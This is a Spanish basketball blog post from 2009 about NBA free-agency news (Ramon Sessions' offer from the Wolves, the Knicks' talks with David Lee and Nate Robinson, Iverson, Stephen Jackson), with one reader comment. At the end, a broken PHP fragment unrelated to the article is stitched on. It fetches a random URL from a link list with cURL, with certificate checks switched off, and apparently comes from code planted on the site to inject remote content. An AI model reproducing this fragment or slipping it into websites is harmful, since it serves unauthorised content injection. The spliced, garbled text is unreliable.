Ramon Sessions sí jugará en los Wolves

06 de September de 2009 por txusma

Hoy hace exactamente un mes que os contábamos que varios jugadores de calidad media-alta se encontraban aún sin equipo y lo que era peor, con sus negociaciones practicamente paradas a la espera de no se sabe muy bien qué. Algunos, como Glen Davis o Linas Kleiza, solucionaron su situación hace un par de semanas poniendo fin a una situación seguramente muy estresante pero otros contínuaban sin saber la camiseta que vestirían esta temporada.

Uno que ya ve la luz al final de tunel es Ramon Sessions que ha recibido una offer sheet de los Wolves por 16 millones de dólars y 4 temporadas. Este el precio que David Kahn ha tenido que pagar por no poder convencer a Ricky de que recalara en la NBA (si es que en algún momento ha habido alguna posibilidad). Con la adquisición de Roko Ukic y la elección en el draft de Brandon Jennings es casi imposible que los Bucks igualen la oferta, así que el ex-base de Nevada, que hace dos años inició la temporada jugando la D-League, pasará a compartir vestuario con Al Jefferson y Kevin Love.

Los que aún siguen sin aclarar su futuro son los jugadores de los Knicks David Lee y Nate Robinson que finalmente podrían verse obligados a aceptar la oferta anual que les ofrece Donnie Walsh. En la Gran Manzana no van a hacer ningún movimiento que ponga en peligro su hueco salarial para el verano del 2010 (Lebron James, Chris Bosh…) y por tanto no piensa ofrecer a ninguno de los 2 jugadores un contrato multianual. Explorada, sin éxito, toda opción de sign-and-trade Lee posiblemente aceptará entre 6 y 8 millones por un temporada y será agente libre sin restricciones al término de la próxima temporada.

Y aún tenemos más cosas:

Allen Iverson está cerquita de firmar por los Grizzlies donde cobraría menos de 5 millones por temporada.
Stephen Jackson ha declarado su interés en ser traspasado de los Warriors y éstos se convierten, de repente, en protagonistas del mercado. Se habla de un posible traspaso con los Mavs y también de que Monta Ellis puede abandonar la franquicia en breve. De momento lo que sin hecho es contratar a Mikki Moore.
– Los Hawks han fichado a Jason Collins dicen que para añadir más profundidad al banquillo.
– Los Celtics confirman el fichaje de Marquis Daniels. Importante incorporación para los verdes.

Comenta

Un comentario a esta entrada

  1. Dantley2 dice:
    #1

    Este año se nota la crisis, están apurando al máximo. Eso y que muchos miran de reojo al verano de 2010. Sessions vale eso. No será un estrellón, pero aporta cosas. Eso sí, la falta de tiro exterior en un equipo como los Wolves puede ser un serio problema. Aunque en ese sentido igual hubieran estado con Ricky. En cualquier caso, no es mal premio de consolación.

    Aunque si yo fuera los Bucks, igualo y ya saldrá alguna oportunidad de hacer algún trade. Pero ya digo, la crisis también se nota en este tipo de decisiones. Como lo de Lee y Robinson, inexplicable cualquier otro año, pero que este año va a ser más común. Igual creo que le puede acabar pasando a Felton.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>